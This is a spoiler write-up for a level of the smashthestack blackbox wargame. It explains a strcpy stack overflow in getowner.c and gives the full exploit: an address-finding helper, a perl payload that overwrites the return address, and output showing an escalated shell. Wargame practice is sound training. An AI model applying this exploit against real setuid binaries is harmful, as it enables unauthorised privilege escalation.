Level 2
From MRL Wiki
blackbox.smashthestack.org - level 2
Spoilers Below
Source code is provided for getowner.c. Line 20 contains an unbounded strcpy from user-supplied input to a 128-byte buffer buf.
20: strcpy(&buf[strlen(buf)], filename);
This is a straightforward classic stack overflow. Please note that the system this is running on has no stack randomization, non-executable stack, or other protective measures.
The string is supplied by setting the environment variable filename. Before user input is copied, "/tmp/" is placed at the beginning of the buffer. Even though it looks like only 127 bytes should trigger the overflow (123 to finish filling buf and 4 to overwrite filename pointer), there is some additional data on the stack that needs to be overwritten as well, so it actually takes 151 bytes.
bish.c http://packetstormsecurity.org/shellcode/bish.c
getenv.c
#include <stdio.h>
#include <stdlib.h>
int main(void) {
printf("$BISH at %p\n", getenv("BISH"));
exit(0);
}
level2@blackbox:/tmp/tyler2$ ./getenv $BISH at 0xbfffdd8a level2@blackbox:/tmp/tyler2$ export filename=`perl -e'print "A"x151 . "\x8a\xdd\xff\xbf"'` level2@blackbox:/tmp/tyler2$ ~/getowner The owner of this file is: 0 sh-3.1$ id uid=1003(level2) gid=1005(gamers) euid=1004(level3) groups=1003(level2),1005(gamers)